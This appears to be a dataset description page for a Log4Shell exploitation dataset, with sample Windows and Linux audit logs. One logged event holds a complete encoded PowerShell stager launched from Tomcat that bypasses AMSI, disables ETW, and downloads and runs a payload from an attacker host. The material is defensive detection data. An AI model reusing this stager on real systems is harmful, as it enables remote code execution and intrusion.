OTFR Log4Shell

Overview
Environment
Activity
Contained Data
Links
Data Examples


Network Data Source	pcaps
Network Data Labeled	No, seems to be implied
Host Data Source	Sysmon for Linux
Host Data Labeled	No, seems to be implied

Overall Setting	Single OS
OS Types	Ubuntu 18.04.6 LTS
Number of Machines	1 (+ Attacker)
Total Runtime	n/a
Year of Collection	2021
Attack Categories	Log4j / Log4Shell
Benign Activity	None

Packed Size	<1 MB
Unpacked Size	1 MB
Download Link	goto

Overview

This is a subset of the Security Datasets Collection focusing on an exploit scenario featuring the Log4j vulnerability.

Environment

A machine (“UBUNTU5”) operating on Ubuntu 18.04.6 LTS is configured as the victim, running Apache Tomcat combined with vulnerable versions of Java libraries (see linked setup below). Information about the attacking machine seems to hidden in various sub-folders, if at all present.

Activity

The attacker exploits CVE 2021-44228, obtaining a shell. Further processes are not detailed, simulated behavior is not present either.

Contained Data

Logs come in the form of sysmon events (generated by Sysmon for Linux) and packet captures, though there are some logs that definitely originate from a Windows machine (they contain Windows-style paths, mention psh execution, NT AUTHORITY, etc.). Their origin is not documented, labeling information in general is also not provided.

Data Examples

Snippet of Windows Sysmon logs taken from securityauditing_log4shell_cve2021_44228_java_serialized_object_2022-05-13045400.json.

{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n  \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-18\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectUserName\"\u003eWORKSTATION5$\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectDomainName\"\u003eWORKGROUP\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectLogonId\"\u003e0x3e7\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u003c/Data\u003e\r\n  \u003cData Name=\"HandleId\"\u003e0x844\u003c/Data\u003e\r\n  \u003cData Name=\"TransactionId\"\u003e{00000000-0000-0000-0000-000000000000}\u003c/Data\u003e\r\n  \u003cData Name=\"AccessList\"\u003e%%1538 \t\t\t\t%%4432 \t\t\t\t%%4435 \t\t\t\t%%4436 \t\t\t\t\u003c/Data\u003e\r\n  \u003cData Name=\"AccessReason\"\u003e-\u003c/Data\u003e\r\n  \u003cData Name=\"AccessMask\"\u003e0x20019\u003c/Data\u003e\r\n  \u003cData Name=\"PrivilegeList\"\u003e-\u003c/Data\u003e\r\n  \u003cData Name=\"RestrictedSidCount\"\u003e0\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessId\"\u003e0x1e24\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n  \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4656,"Activity":"4656 - A handle to an object was requested.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Account":"WORKGROUP\\WORKSTATION5$","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n  \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-18\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectUserName\"\u003eWORKSTATION5$\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectDomainName\"\u003eWORKGROUP\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectLogonId\"\u003e0x3e7\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u003c/Data\u003e\r\n  \u003cData Name=\"HandleId\"\u003e0x844\u003c/Data\u003e\r\n  \u003cData Name=\"AccessList\"\u003e%%4432 \t\t\t\t\u003c/Data\u003e\r\n  \u003cData Name=\"AccessMask\"\u003e0x1\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessId\"\u003e0x1e24\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n  \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4663,"Activity":"4663 - An attempt was made to access an object.","AccessList":"%%4432 \t\t\t\t","AccessMask":"0x1","HandleId":"0x844","ObjectName":"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","ObjectServer":"Security","ObjectType":"Key","Process":"powershell.exe","ProcessId":"0x1e24","ProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SubjectAccount":"WORKGROUP\\WORKSTATION5$","SubjectDomainName":"WORKGROUP","SubjectLogonId":"0x3e7","SubjectUserName":"WORKSTATION5$","SubjectUserSid":"S-1-5-18","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n  \u003cData Name=\"ProcessId\"\u003e3936\u003c/Data\u003e\r\n  \u003cData Name=\"Application\"\u003e\\device\\harddiskvolume2\\programdata\\chocolatey\\lib\\tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe\u003c/Data\u003e\r\n  \u003cData Name=\"SourceAddress\"\u003e::\u003c/Data\u003e\r\n  \u003cData Name=\"SourcePort\"\u003e54225\u003c/Data\u003e\r\n  \u003cData Name=\"Protocol\"\u003e6\u003c/Data\u003e\r\n  \u003cData Name=\"FilterRTID\"\u003e0\u003c/Data\u003e\r\n  \u003cData Name=\"LayerName\"\u003e%%14608\u003c/Data\u003e\r\n  \u003cData Name=\"LayerRTID\"\u003e38\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":5158,"Activity":"5158 - The Windows Filtering Platform has permitted a bind to a local port.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n  \u003cData Name=\"ProcessID\"\u003e3936\u003c/Data\u003e\r\n  \u003cData Name=\"Application\"\u003e\\device\\harddiskvolume2\\programdata\\chocolatey\\lib\\tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe\u003c/Data\u003e\r\n  \u003cData Name=\"Direction\"\u003e%%14593\u003c/Data\u003e\r\n  \u003cData Name=\"SourceAddress\"\u003e192.168.2.5\u003c/Data\u003e\r\n  \u003cData Name=\"SourcePort\"\u003e54225\u003c/Data\u003e\r\n  \u003cData Name=\"DestAddress\"\u003e192.168.3.5\u003c/Data\u003e\r\n  \u003cData Name=\"DestPort\"\u003e1389\u003c/Data\u003e\r\n  \u003cData Name=\"Protocol\"\u003e6\u003c/Data\u003e\r\n  \u003cData Name=\"FilterRTID\"\u003e69359\u003c/Data\u003e\r\n  \u003cData Name=\"LayerName\"\u003e%%14611\u003c/Data\u003e\r\n  \u003cData Name=\"LayerRTID\"\u003e48\u003c/Data\u003e\r\n  \u003cData Name=\"RemoteUserID\"\u003eS-1-0-0\u003c/Data\u003e\r\n  \u003cData Name=\"RemoteMachineID\"\u003eS-1-0-0\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":5156,"Activity":"5156 - The Windows Filtering Platform has allowed a connection.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.42Z","SourceSystem":"OpsManager","Account":"NT AUTHORITY\\LOCAL SERVICE","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventID":4688,"Activity":"4688 - A new process has been created.","CommandLine":"powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAHcAQQB1AEEARABVAEEATwBnAEEAMABBAEQAUQBBAE0AdwBBAD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwBYAGYAUwBWAEIAOwBbAEkASwAzAGUALQBnAHQAagBUACMAXgB6AEwANABEAF8APABFAC8ALgB2AHIAbwA9AE8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAGwAWAB4AGMAQgBkAD0AdgBxAHcAdQBpAG8AagBTAC8AUQBjAGUAaQBMAE4AZABIAFcAdABaAGcAeQBWACsARABwAFkAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==","MandatoryLabel":"S-1-16-16384","NewProcessId":"0x824","NewProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessName":"C:\\ProgramData\\chocolatey\\lib\\Tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe","Process":"powershell.exe","ProcessId":"0xf60","SubjectAccount":"NT AUTHORITY\\LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","SubjectUserName":"LOCAL SERVICE","SubjectUserSid":"S-1-5-19","TargetAccount":"-\\-","TargetDomainName":"-","TargetLogonId":"0x0","TargetUserName":"-","TargetUserSid":"S-1-0-0","TokenElevationType":"%%1936","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.713Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n  \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-19\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectUserName\"\u003eLOCAL SERVICE\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectDomainName\"\u003eNT AUTHORITY\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectLogonId\"\u003e0x3e5\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\u003c/Data\u003e\r\n  \u003cData Name=\"HandleId\"\u003e0x260\u003c/Data\u003e\r\n  \u003cData Name=\"TransactionId\"\u003e{00000000-0000-0000-0000-000000000000}\u003c/Data\u003e\r\n  \u003cData Name=\"AccessList\"\u003e%%4432 \t\t\t\t\u003c/Data\u003e\r\n  \u003cData Name=\"AccessReason\"\u003e-\u003c/Data\u003e\r\n  \u003cData Name=\"AccessMask\"\u003e0x1\u003c/Data\u003e\r\n  \u003cData Name=\"PrivilegeList\"\u003e-\u003c/Data\u003e\r\n  \u003cData Name=\"RestrictedSidCount\"\u003e0\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessId\"\u003e0x824\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n  \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4656,"Activity":"4656 - A handle to an object was requested.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.713Z","SourceSystem":"OpsManager","Account":"NT AUTHORITY\\LOCAL SERVICE","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventID":4688,"Activity":"4688 - A new process has been created.","CommandLine":"\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1","MandatoryLabel":"S-1-16-16384","NewProcessId":"0x2e04","NewProcessName":"C:\\Windows\\System32\\conhost.exe","ParentProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Process":"conhost.exe","ProcessId":"0x824","SubjectAccount":"NT AUTHORITY\\LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","SubjectUserName":"LOCAL SERVICE","SubjectUserSid":"S-1-5-19","TargetAccount":"-\\-","TargetDomainName":"-","TargetLogonId":"0x0","TargetUserName":"-","TargetUserSid":"S-1-0-0","TokenElevationType":"%%1936","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.713Z","SourceSystem":"OpsManager","Account":"NT AUTHORITY\\LOCAL SERVICE","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n  \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-19\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectUserName\"\u003eLOCAL SERVICE\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectDomainName\"\u003eNT AUTHORITY\u003c/Data\u003e\r\n  \u003cData Name=\"SubjectLogonId\"\u003e0x3e5\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n  \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\u003c/Data\u003e\r\n  \u003cData Name=\"HandleId\"\u003e0x260\u003c/Data\u003e\r\n  \u003cData Name=\"AccessList\"\u003e%%4432 \t\t\t\t\u003c/Data\u003e\r\n  \u003cData Name=\"AccessMask\"\u003e0x1\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessId\"\u003e0x824\u003c/Data\u003e\r\n  \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n  \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4663,"Activity":"4663 - An attempt was made to access an object.","AccessList":"%%4432 \t\t\t\t","AccessMask":"0x1","HandleId":"0x260","ObjectName":"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa","ObjectServer":"Security","ObjectType":"Key","Process":"powershell.exe","ProcessId":"0x824","ProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SubjectAccount":"NT AUTHORITY\\LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","SubjectUserName":"LOCAL SERVICE","SubjectUserSid":"S-1-5-19","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}

Snippet of Linux Sysmon logs taken from syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference_2022-05-11181020.json.

{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:21.997Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84138): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:21.997Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84139): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= 